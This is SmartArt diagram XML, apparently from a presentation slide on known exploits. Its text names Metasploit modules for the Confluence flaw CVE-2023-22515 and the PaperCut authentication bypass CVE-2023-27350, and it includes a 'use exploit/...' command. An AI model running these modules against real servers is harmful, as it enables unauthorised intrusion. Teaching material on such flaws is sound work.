    <dgm:pt modelId="{2710EA5E-C778-574A-BCB9-34036A5F8213}" type="pres">
      <dgm:prSet presAssocID="{8A2AF6F2-FC09-4AA1-802E-011DEC5E3254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92F19EB2-AF97-9F49-A8A3-A4B81ABA7E2E}" type="pres">
      <dgm:prSet presAssocID="{F78497DE-2462-4D37-A436-C6086E62DE8F}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{05085D1D-68E8-4140-961D-8B4F4F098364}" type="pres">
      <dgm:prSet presAssocID="{08E0F5AC-7E15-461D-9644-C1DDBCCE5043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EFAC4F41-E2A5-C94C-836F-E2A1CC4D5C21}" type="pres">
      <dgm:prSet presAssocID="{56188926-022A-4067-B1F7-240AD894B82C}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A4DBDC3F-0C99-3D4A-9546-DB440B8DD493}" type="pres">
      <dgm:prSet presAssocID="{56985E8E-9D4A-484F-975B-DD63E4C58CA4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F0713DA5-AF3F-AA42-BEB7-A5B1340AC017}" type="pres">
      <dgm:prSet presAssocID="{CCDBB0DA-9191-4096-A4BB-17CD5FE5B050}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C4D77DF7-04FF-D24E-A2A6-7E28BEBEEACE}" type="pres">
      <dgm:prSet presAssocID="{699D8633-3583-4161-8E4D-AB3C909B0B9B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169A0A0C-3844-4F62-99F1-708CB97F4CF9}" srcId="{B230AB5E-98E2-4585-803E-50D16823B0C6}" destId="{699D8633-3583-4161-8E4D-AB3C909B0B9B}" srcOrd="9" destOrd="0" parTransId="{43486210-9AF2-4442-93FD-A878C7809F33}" sibTransId="{51FA9D35-BF46-4B99-B13C-5F7172EE6D02}"/>
    <dgm:cxn modelId="{66FBC712-C214-674F-B644-C25A61E608AF}" type="presOf" srcId="{B230AB5E-98E2-4585-803E-50D16823B0C6}" destId="{B859BFCF-DF6A-2148-9911-1345A9BB562F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{19D41640-1C4D-49E9-AC15-B75D53447678}" srcId="{B230AB5E-98E2-4585-803E-50D16823B0C6}" destId="{BBF0D456-0B68-4167-8FFB-778D95180561}" srcOrd="1" destOrd="0" parTransId="{D49E934B-6AB8-4D09-9C29-E58DB492A185}" sibTransId="{EFEFB360-1B2D-428C-AF42-EA12B0D721C2}"/>
    <dgm:cxn modelId="{E93A2141-9684-7347-9879-E9252FA9B76E}" type="presOf" srcId="{5F5111DF-21A6-4049-94D2-F4A432F7F4A8}" destId="{DDBF5CB2-8F5B-E540-820C-5280CF95BC71}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{C91F984E-4E98-479B-A413-D19684C43D5E}" srcId="{B230AB5E-98E2-4585-803E-50D16823B0C6}" destId="{5F5111DF-21A6-4049-94D2-F4A432F7F4A8}" srcOrd="5" destOrd="0" parTransId="{C8BA4D85-218D-40F8-A643-7832F43B298B}" sibTransId="{64F13BE2-C5C9-4CC7-9B6C-D480B13C344F}"/>
    <dgm:cxn modelId="{80773D56-3EE2-CA41-BF9C-5B871B30A1F2}" type="presOf" srcId="{56985E8E-9D4A-484F-975B-DD63E4C58CA4}" destId="{A4DBDC3F-0C99-3D4A-9546-DB440B8DD493}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{ED91936A-0F64-EC4A-9FA3-CB305CC29CFE}" type="presOf" srcId="{60FC8B94-6406-43DA-8545-14F64A1109C3}" destId="{987B758C-B9DD-2F4B-A12D-AE58ADDFADB8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{A260ED7E-BFEC-8A4F-B31C-256D4F7881C1}" type="presOf" srcId="{8A2AF6F2-FC09-4AA1-802E-011DEC5E3254}" destId="{2710EA5E-C778-574A-BCB9-34036A5F8213}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{47DD1F98-B042-FD46-A6B5-C792F45C722F}" type="presOf" srcId="{BBF0D456-0B68-4167-8FFB-778D95180561}" destId="{77EF4160-D041-7347-AE67-3FC2F12623D7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{32EE81A9-58F0-4143-9869-CDD501E28D35}" srcId="{B230AB5E-98E2-4585-803E-50D16823B0C6}" destId="{63BC1EA3-3DAE-43A5-8D30-F781417713F5}" srcOrd="2" destOrd="0" parTransId="{914E4AB3-8655-4EC0-89A1-FE6EF819468E}" sibTransId="{9B9DB058-2E92-490C-9B98-EE2380921D98}"/>
    <dgm:cxn modelId="{C45F8DAA-33D2-5845-9BD1-38CE110BBA14}" type="presOf" srcId="{699D8633-3583-4161-8E4D-AB3C909B0B9B}" destId="{C4D77DF7-04FF-D24E-A2A6-7E28BEBEEACE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{4FF191AC-F9EB-4CFA-8DE8-0949BE7341A8}" srcId="{B230AB5E-98E2-4585-803E-50D16823B0C6}" destId="{F619C91A-A4CD-4D4F-BC73-47D3862C1B04}" srcOrd="3" destOrd="0" parTransId="{439380C8-F211-4D05-BC14-FB919C96605B}" sibTransId="{8638F325-4AF5-4DD0-BE8C-68D9E87CC820}"/>
    <dgm:cxn modelId="{71E8CDB3-E79C-4128-9635-A1DD9C65F044}" srcId="{B230AB5E-98E2-4585-803E-50D16823B0C6}" destId="{8A2AF6F2-FC09-4AA1-802E-011DEC5E3254}" srcOrd="6" destOrd="0" parTransId="{455C87E0-8F98-4942-9B98-1791B4E41FB2}" sibTransId="{F78497DE-2462-4D37-A436-C6086E62DE8F}"/>
    <dgm:cxn modelId="{C28C12B7-8444-4641-8BF1-C3C303817CAA}" srcId="{B230AB5E-98E2-4585-803E-50D16823B0C6}" destId="{56985E8E-9D4A-484F-975B-DD63E4C58CA4}" srcOrd="8" destOrd="0" parTransId="{357AB8E8-642D-4542-8EC1-5E62361DA60F}" sibTransId="{CCDBB0DA-9191-4096-A4BB-17CD5FE5B050}"/>
    <dgm:cxn modelId="{636A6AC2-B58D-404C-8DBD-7057C9C5BBED}" srcId="{B230AB5E-98E2-4585-803E-50D16823B0C6}" destId="{F8340262-EF82-43E5-94C6-2DF400EE6A33}" srcOrd="4" destOrd="0" parTransId="{E7D4AAA4-FF45-4A38-BB4A-714EB16B317A}" sibTransId="{DBB62151-AE15-4513-9A55-FB51756C149D}"/>
    <dgm:cxn modelId="{6D546FE8-BE20-1A4B-B628-BD3B5565188F}" type="presOf" srcId="{F619C91A-A4CD-4D4F-BC73-47D3862C1B04}" destId="{448AD047-D235-0041-BDAA-CCFDBC3B08C6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{5C59A5EF-3F79-9B47-867B-9E2D1DA03FD3}" type="presOf" srcId="{63BC1EA3-3DAE-43A5-8D30-F781417713F5}" destId="{0398D707-2E6E-1D45-9FD4-45F405E586F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{2C6EA8F3-64E3-2347-A944-0F89B4258AC6}" type="presOf" srcId="{08E0F5AC-7E15-461D-9644-C1DDBCCE5043}" destId="{05085D1D-68E8-4140-961D-8B4F4F098364}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{1BBB84F4-3A79-7845-B6DD-42D05F180FA8}" type="presOf" srcId="{F8340262-EF82-43E5-94C6-2DF400EE6A33}" destId="{1EDF4C54-D71F-F24C-AD2D-8983878CD817}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{7DAD5BF5-BC64-4390-B6D6-8F0E7EBE16AD}" srcId="{B230AB5E-98E2-4585-803E-50D16823B0C6}" destId="{08E0F5AC-7E15-461D-9644-C1DDBCCE5043}" srcOrd="7" destOrd="0" parTransId="{168BEF23-7252-4215-BBED-2C6C17AC47EF}" sibTransId="{56188926-022A-4067-B1F7-240AD894B82C}"/>
    <dgm:cxn modelId="{FE42DEFD-AE95-4D54-93FA-BCE533E40E74}" srcId="{B230AB5E-98E2-4585-803E-50D16823B0C6}" destId="{60FC8B94-6406-43DA-8545-14F64A1109C3}" srcOrd="0" destOrd="0" parTransId="{55ED4718-92B7-41D5-8612-70F9F189112A}" sibTransId="{FF1EFE9A-ACA9-4A62-813A-6B6B660C4D45}"/>
    <dgm:cxn modelId="{189D30A8-2893-FC4D-BE4B-2FD25E8B28FC}" type="presParOf" srcId="{B859BFCF-DF6A-2148-9911-1345A9BB562F}" destId="{987B758C-B9DD-2F4B-A12D-AE58ADDFADB8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{13F18A7D-57CD-0149-BF2F-D6D9D528D99A}" type="presParOf" srcId="{B859BFCF-DF6A-2148-9911-1345A9BB562F}" destId="{AA043137-B605-294B-8A2D-5CA20139CADF}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{6B6E9C0A-6BAF-EE42-A4B6-CAB824C0CC36}" type="presParOf" srcId="{B859BFCF-DF6A-2148-9911-1345A9BB562F}" destId="{77EF4160-D041-7347-AE67-3FC2F12623D7}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{8E34E47E-4F32-BA44-95EA-304FE53C59C9}" type="presParOf" srcId="{B859BFCF-DF6A-2148-9911-1345A9BB562F}" destId="{5A868245-F14B-5942-A0BE-AF0124103AF6}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{34C6E034-F7E3-9641-80C7-62F67FED0935}" type="presParOf" srcId="{B859BFCF-DF6A-2148-9911-1345A9BB562F}" destId="{0398D707-2E6E-1D45-9FD4-45F405E586F4}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{F7455322-EF4F-224F-AA93-25E8FA97BB89}" type="presParOf" srcId="{B859BFCF-DF6A-2148-9911-1345A9BB562F}" destId="{21E27B0D-6E9B-3041-9338-59CD3D96B730}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{0CCB1976-25B1-B54B-9A19-5589FEBEE8DB}" type="presParOf" srcId="{B859BFCF-DF6A-2148-9911-1345A9BB562F}" destId="{448AD047-D235-0041-BDAA-CCFDBC3B08C6}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{01702888-ECA1-954E-B125-1DE73EA6B346}" type="presParOf" srcId="{B859BFCF-DF6A-2148-9911-1345A9BB562F}" destId="{02E34676-2C53-A24E-946F-5D727EB8332B}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{EA47F02A-3F94-F84A-ACAC-8FFBDE35589D}" type="presParOf" srcId="{B859BFCF-DF6A-2148-9911-1345A9BB562F}" destId="{1EDF4C54-D71F-F24C-AD2D-8983878CD817}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{C1B7A1B2-43A8-264D-9EFF-8E7F5A0C9ABC}" type="presParOf" srcId="{B859BFCF-DF6A-2148-9911-1345A9BB562F}" destId="{EF163A10-3A52-FA4D-8A4A-7B8AD74423BD}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{D1AE1DA0-07C7-6D44-ADEB-6CD004C6C868}" type="presParOf" srcId="{B859BFCF-DF6A-2148-9911-1345A9BB562F}" destId="{DDBF5CB2-8F5B-E540-820C-5280CF95BC71}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{9539EF03-4C33-7E41-A792-AA68FD19D079}" type="presParOf" srcId="{B859BFCF-DF6A-2148-9911-1345A9BB562F}" destId="{B0384050-5C8F-2442-870D-AC9C2372E49C}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{30AECCC0-D1A2-2349-8C82-7344D9DCA1F3}" type="presParOf" srcId="{B859BFCF-DF6A-2148-9911-1345A9BB562F}" destId="{2710EA5E-C778-574A-BCB9-34036A5F8213}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{55A1DDFA-669B-5347-9152-131F4F66F91F}" type="presParOf" srcId="{B859BFCF-DF6A-2148-9911-1345A9BB562F}" destId="{92F19EB2-AF97-9F49-A8A3-A4B81ABA7E2E}" srcOrd="13" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{0DF568C6-9C45-6B43-9FB6-6841CA4FFA4F}" type="presParOf" srcId="{B859BFCF-DF6A-2148-9911-1345A9BB562F}" destId="{05085D1D-68E8-4140-961D-8B4F4F098364}" srcOrd="14" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{32D27EF5-6402-0440-8129-AB19B07BCE1C}" type="presParOf" srcId="{B859BFCF-DF6A-2148-9911-1345A9BB562F}" destId="{EFAC4F41-E2A5-C94C-836F-E2A1CC4D5C21}" srcOrd="15" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{52D01064-FDE0-144F-BB66-AE12C7B7740F}" type="presParOf" srcId="{B859BFCF-DF6A-2148-9911-1345A9BB562F}" destId="{A4DBDC3F-0C99-3D4A-9546-DB440B8DD493}" srcOrd="16" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{1986C670-505B-3D46-8BF5-A7F6BD847BD5}" type="presParOf" srcId="{B859BFCF-DF6A-2148-9911-1345A9BB562F}" destId="{F0713DA5-AF3F-AA42-BEB7-A5B1340AC017}" srcOrd="17" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{D4114B97-995D-494D-A55F-CD4646D19D40}" type="presParOf" srcId="{B859BFCF-DF6A-2148-9911-1345A9BB562F}" destId="{C4D77DF7-04FF-D24E-A2A6-7E28BEBEEACE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6E457A9-5D67-4C09-B3B8-4B0F5E80F68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3A0804-3F29-477A-8885-B6E38DED0B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CMD -</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" dirty="0"/>
            <a:t>use exploit/multi/http/atlassian_confluence_rce_cve_2023_22515</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{494EE0DD-37F2-4C79-8F82-B22C75CA22EC}" type="parTrans" cxnId="{DCF46EF3-C593-4FA7-A405-D7E6AA900F04}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D62662F3-FE71-4509-94AB-0DDCFD1FC2B5}" type="sibTrans" cxnId="{DCF46EF3-C593-4FA7-A405-D7E6AA900F04}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AA0E2896-0C68-43D7-A21C-3D35872A985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/>
            <a:t>Metasploit Module: </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" dirty="0"/>
            <a:t>exploit/multi/http/atlassian_confluence_rce_cve_2023_22515</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{14B304C5-86AB-42E0-A294-AEE9B8B83BDD}" type="parTrans" cxnId="{272BDBB8-48B2-4F86-AD64-44A342A7C18D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CF5C421B-184A-43C1-8943-A826B1279EDC}" type="sibTrans" cxnId="{272BDBB8-48B2-4F86-AD64-44A342A7C18D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{20CA19D2-F4F9-4E15-A109-C6AC13B9992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The exploit/multi/http/</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" dirty="0" err="1"/>
            <a:t>papercut_ng_auth_bypass</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" dirty="0"/>
            <a:t> module targets a critical </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" b="1" dirty="0"/>
            <a:t>authentication bypass vulnerability</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" dirty="0"/>
            <a:t> in </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" dirty="0" err="1"/>
            <a:t>PaperCut</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" dirty="0"/>
            <a:t> NG and </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" dirty="0" err="1"/>
            <a:t>PaperCut</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" dirty="0"/>
            <a:t> MF print management software. This vulnerability is tracked as </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" b="1" dirty="0"/>
            <a:t>CVE-2023-27350</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" dirty="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3EC139AB-66FE-4A9F-BD64-601137C94F02}" type="parTrans" cxnId="{5CEC5971-E83B-44DC-A372-4E8440C930F9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1E4B1C30-669B-43EA-8CA5-F0366CDC612C}" type="sibTrans" cxnId="{5CEC5971-E83B-44DC-A372-4E8440C930F9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E1578CDF-1CC0-4CF7-B664-BAC99EDC91E3}" type="pres">
      <dgm:prSet presAssocID="{36E457A9-5D67-4C09-B3B8-4B0F5E80F689}" presName="root" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4482B109-A338-46FA-BF7F-4057B0915E10}" type="pres">
      <dgm:prSet presAssocID="{2A3A0804-3F29-477A-8885-B6E38DED0B48}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{156C3B22-071C-4062-AA37-0F35BB040322}" type="pres">
      <dgm:prSet presAssocID="{2A3A0804-3F29-477A-8885-B6E38DED0B48}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="0" presStyleCnt="3" custScaleY="105226" custLinFactNeighborX="2135" custLinFactNeighborY="11912"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A3626F69-75E1-417B-8A94-3AEB2B76464E}" type="pres">
      <dgm:prSet presAssocID="{2A3A0804-3F29-477A-8885-B6E38DED0B4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432B6D7E-DFEA-4A46-BD8B-0C9AF9EFD999}" type="pres">
      <dgm:prSet presAssocID="{2A3A0804-3F29-477A-8885-B6E38DED0B48}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C733175B-7DA9-4E40-B363-21852094A784}" type="pres">
      <dgm:prSet presAssocID="{2A3A0804-3F29-477A-8885-B6E38DED0B48}" presName="parTx" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="3" custScaleX="112683" custScaleY="147448">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{60EE112B-C560-43D1-B675-BCE79A04EDE3}" type="pres">
      <dgm:prSet presAssocID="{D62662F3-FE71-4509-94AB-0DDCFD1FC2B5}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{855059C5-6FD5-4129-B463-0BFA70969E12}" type="pres">
      <dgm:prSet presAssocID="{AA0E2896-0C68-43D7-A21C-3D35872A9850}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E85886CE-50D5-4FE9-A3E7-3BEF18C7CBCD}" type="pres">
      <dgm:prSet presAssocID="{AA0E2896-0C68-43D7-A21C-3D35872A9850}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="1" presStyleCnt="3" custLinFactNeighborX="-242" custLinFactNeighborY="-5871"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B9EFDCFD-4630-4FD0-9A2B-1E878209E586}" type="pres">
      <dgm:prSet presAssocID="{AA0E2896-0C68-43D7-A21C-3D35872A98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335B7C18-626D-445C-9952-6C365D983F20}" type="pres">
      <dgm:prSet presAssocID="{AA0E2896-0C68-43D7-A21C-3D35872A9850}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{210190EF-6363-470E-9ED2-DF4166F62C21}" type="pres">
      <dgm:prSet presAssocID="{AA0E2896-0C68-43D7-A21C-3D35872A9850}" presName="parTx" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="3" custScaleX="104981" custScaleY="100000" custLinFactNeighborY="-14332">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D87A6A4E-96F2-48AE-94D3-CE9F6E919F6C}" type="pres">
      <dgm:prSet presAssocID="{CF5C421B-184A-43C1-8943-A826B1279EDC}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1832B930-4AC5-4751-8763-92A2013F331B}" type="pres">
      <dgm:prSet presAssocID="{20CA19D2-F4F9-4E15-A109-C6AC13B99920}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{935AA0A1-5642-4D6A-8190-4379065F4ABE}" type="pres">
      <dgm:prSet presAssocID="{20CA19D2-F4F9-4E15-A109-C6AC13B99920}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="2" presStyleCnt="3" custScaleY="120131"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FF38DB3D-6778-4801-838D-A6117CC9B5DE}" type="pres">
      <dgm:prSet presAssocID="{20CA19D2-F4F9-4E15-A109-C6AC13B9992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D30DF0BE-8E6D-4D6B-8AB5-8B811DF78AEC}" type="pres">
      <dgm:prSet presAssocID="{20CA19D2-F4F9-4E15-A109-C6AC13B99920}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F657626B-9FFB-4254-8208-06BBE0E0C782}" type="pres">
      <dgm:prSet presAssocID="{20CA19D2-F4F9-4E15-A109-C6AC13B99920}" presName="parTx" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="3" custScaleX="106233" custScaleY="103692" custLinFactNeighborX="-6061" custLinFactNeighborY="-13487">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{00F01227-658D-4BB4-9EDC-354CC62995B9}" type="presOf" srcId="{20CA19D2-F4F9-4E15-A109-C6AC13B99920}" destId="{F657626B-9FFB-4254-8208-06BBE0E0C782}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{423F0337-F037-4819-8267-7F151C271E06}" type="presOf" srcId="{2A3A0804-3F29-477A-8885-B6E38DED0B48}" destId="{C733175B-7DA9-4E40-B363-21852094A784}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{9C8B5565-D97D-4C5E-946C-976CB9C5E2B7}" type="presOf" srcId="{36E457A9-5D67-4C09-B3B8-4B0F5E80F689}" destId="{E1578CDF-1CC0-4CF7-B664-BAC99EDC91E3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{5CEC5971-E83B-44DC-A372-4E8440C930F9}" srcId="{36E457A9-5D67-4C09-B3B8-4B0F5E80F689}" destId="{20CA19D2-F4F9-4E15-A109-C6AC13B99920}" srcOrd="2" destOrd="0" parTransId="{3EC139AB-66FE-4A9F-BD64-601137C94F02}" sibTransId="{1E4B1C30-669B-43EA-8CA5-F0366CDC612C}"/>
    <dgm:cxn modelId="{272BDBB8-48B2-4F86-AD64-44A342A7C18D}" srcId="{36E457A9-5D67-4C09-B3B8-4B0F5E80F689}" destId="{AA0E2896-0C68-43D7-A21C-3D35872A9850}" srcOrd="1" destOrd="0" parTransId="{14B304C5-86AB-42E0-A294-AEE9B8B83BDD}" sibTransId="{CF5C421B-184A-43C1-8943-A826B1279EDC}"/>
    <dgm:cxn modelId="{BADAB9E2-9505-4DF5-B395-F084726AC71E}" type="presOf" srcId="{AA0E2896-0C68-43D7-A21C-3D35872A9850}" destId="{210190EF-6363-470E-9ED2-DF4166F62C21}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{DCF46EF3-C593-4FA7-A405-D7E6AA900F04}" srcId="{36E457A9-5D67-4C09-B3B8-4B0F5E80F689}" destId="{2A3A0804-3F29-477A-8885-B6E38DED0B48}" srcOrd="0" destOrd="0" parTransId="{494EE0DD-37F2-4C79-8F82-B22C75CA22EC}" sibTransId="{D62662F3-FE71-4509-94AB-0DDCFD1FC2B5}"/>
    <dgm:cxn modelId="{AC34F5A3-9950-48D3-A034-D0251D3C2C95}" type="presParOf" srcId="{E1578CDF-1CC0-4CF7-B664-BAC99EDC91E3}" destId="{4482B109-A338-46FA-BF7F-4057B0915E10}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{49908446-31A8-4A9D-B27F-BF3738F0641C}" type="presParOf" srcId="{4482B109-A338-46FA-BF7F-4057B0915E10}" destId="{156C3B22-071C-4062-AA37-0F35BB040322}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{148DE9C8-4B21-4036-8E3D-6E52BE9A3610}" type="presParOf" srcId="{4482B109-A338-46FA-BF7F-4057B0915E10}" destId="{A3626F69-75E1-417B-8A94-3AEB2B76464E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{2E48362D-0D73-446E-A237-B633CC1B4156}" type="presParOf" srcId="{4482B109-A338-46FA-BF7F-4057B0915E10}" destId="{432B6D7E-DFEA-4A46-BD8B-0C9AF9EFD999}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{3595F194-3AF5-47F9-AFC9-CAB6FC2085A9}" type="presParOf" srcId="{4482B109-A338-46FA-BF7F-4057B0915E10}" destId="{C733175B-7DA9-4E40-B363-21852094A784}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
